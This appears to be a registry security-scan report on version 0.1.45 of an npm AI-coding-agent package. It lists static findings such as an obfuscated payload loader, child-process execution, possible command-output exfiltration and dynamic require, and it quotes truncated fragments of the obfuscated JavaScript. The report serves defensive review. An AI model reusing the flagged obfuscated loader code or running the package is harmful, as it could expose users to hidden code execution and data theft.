registry  /  dskcode  /  0.1.45

dskcode@0.1.45

⚠ Under review

A DeepSeek-native AI coding agent for your terminal

Static Scan Results

scanned 9d ago · by rust-scanner

Static analysis flagged 12 finding(s) at 93.0% confidence. This version is warn-only unless an AI or security-team review confirms malicious behavior.

Static reason
One or more suspicious static signals were detected.; previous stored version diff introduced dangerous source

Decision evidence

public snapshot
Behavioral surface
Source
ChildProcessDynamicRequireNetwork
Supply chain
HighEntropyStringsMinifiedTelemetry
ManifestNo manifest risk signals triggered.
scanned 354 file(s), 26.0 MB of source
Oversized source lightweight scan
dist/emacs-lisp-NRIAYFLD.js2.80 MB file, sampled 256 KB
HighEntropyStringsMinified
dist/wasm-FXCISVGQ.js2.23 MB file, sampled 256 KB
Minified

Source & flagged code

6 flagged · loading source
dist/index.jsView file
matchType = previous_version_dangerous_delta matchedPackage = dskcode@0.1.44 matchedIdentity = npm:ZHNrY29kZQ:0.1.44 similarity = 0.667 summary = stored previous version shares package body but lacks this dangerous source file
Critical
Previous Version Dangerous Delta

This package version adds a dangerous source file absent from the previous stored version; route for source-aware review.

dist/index.jsView on unpkg
47| \\?. L48: `[lG(0xc77,0x11a2,0x43f,0x13bb)](/\s+/g,''),lG(0x1054,0x1482,0x10ce,0x148a));function Tl(fP){function QG(fP,fQ,fS,fU){return lF(fU,fQ-0x141,fS- -0x8e,fU-0x21);}if(!new RegExp(Wp+'\...
High
Child Process

Package source references child process execution.

dist/index.jsView on unpkg · L47
47| \\?. L48: `[lG(0xc77,0x11a2,0x43f,0x13bb)](/\s+/g,''),lG(0x1054,0x1482,0x10ce,0x148a));function Tl(fP){function QG(fP,fQ,fS,fU){return lF(fU,fQ-0x141,fS- -0x8e,fU-0x21);}if(!new RegExp(Wp+'\...
High
Command Output Exfiltration

Source combines command execution, command-output handling, and outbound requests; review data flow before blocking.

dist/index.jsView on unpkg · L47
1#!/usr/bin/env node L2: (function(fP,fQ){const fS=fP();function l6(fP,fQ,fS,fU){return b(fU- -0x2,fQ);}function l5(fP,fQ,fS,fU){return b(fP- -0x3b2,fU);}while(!![]){try{const fU=parseInt(l5(-0x29c,-0x8a6,... L3: \\ (?:
Medium
Dynamic Require

Package source references dynamic require/import behavior.

dist/index.jsView on unpkg · L1
dist/d-VFMGCSG3.jsView file
1function b(c,d){c=c-(0x224a+0xd*0x111+-0x1*0x2f9d);var e=a();var f=e[c];if(b['UkgttU']===undefined){var g=function(l){var m='[redacted]...
High
Obfuscated Payload Loader

Source contains an obfuscator-style string-array loader that reconstructs and executes hidden code.

dist/d-VFMGCSG3.jsView on unpkg · L1
dist/emacs-lisp-NRIAYFLD.jsView file
path = dist/emacs-lisp-NRIAYFLD.js kind = oversized_source_file sizeBytes = 2932923 magicHex = [redacted]
High
Oversized Source File

Package contains source files above the static scanner size ceiling.

dist/emacs-lisp-NRIAYFLD.jsView on unpkg

Findings

1 Critical4 High3 Medium4 Low
CriticalPrevious Version Dangerous Deltadist/index.js
HighChild Processdist/index.js
HighCommand Output Exfiltrationdist/index.js
HighObfuscated Payload Loaderdist/d-VFMGCSG3.js
HighOversized Source Filedist/emacs-lisp-NRIAYFLD.js
MediumDynamic Requiredist/index.js
MediumNetwork
MediumStructural Risk Force Deep Review
LowNon Install Lifecycle Scripts
LowScripts Present
LowHigh Entropy Strings
LowTelemetry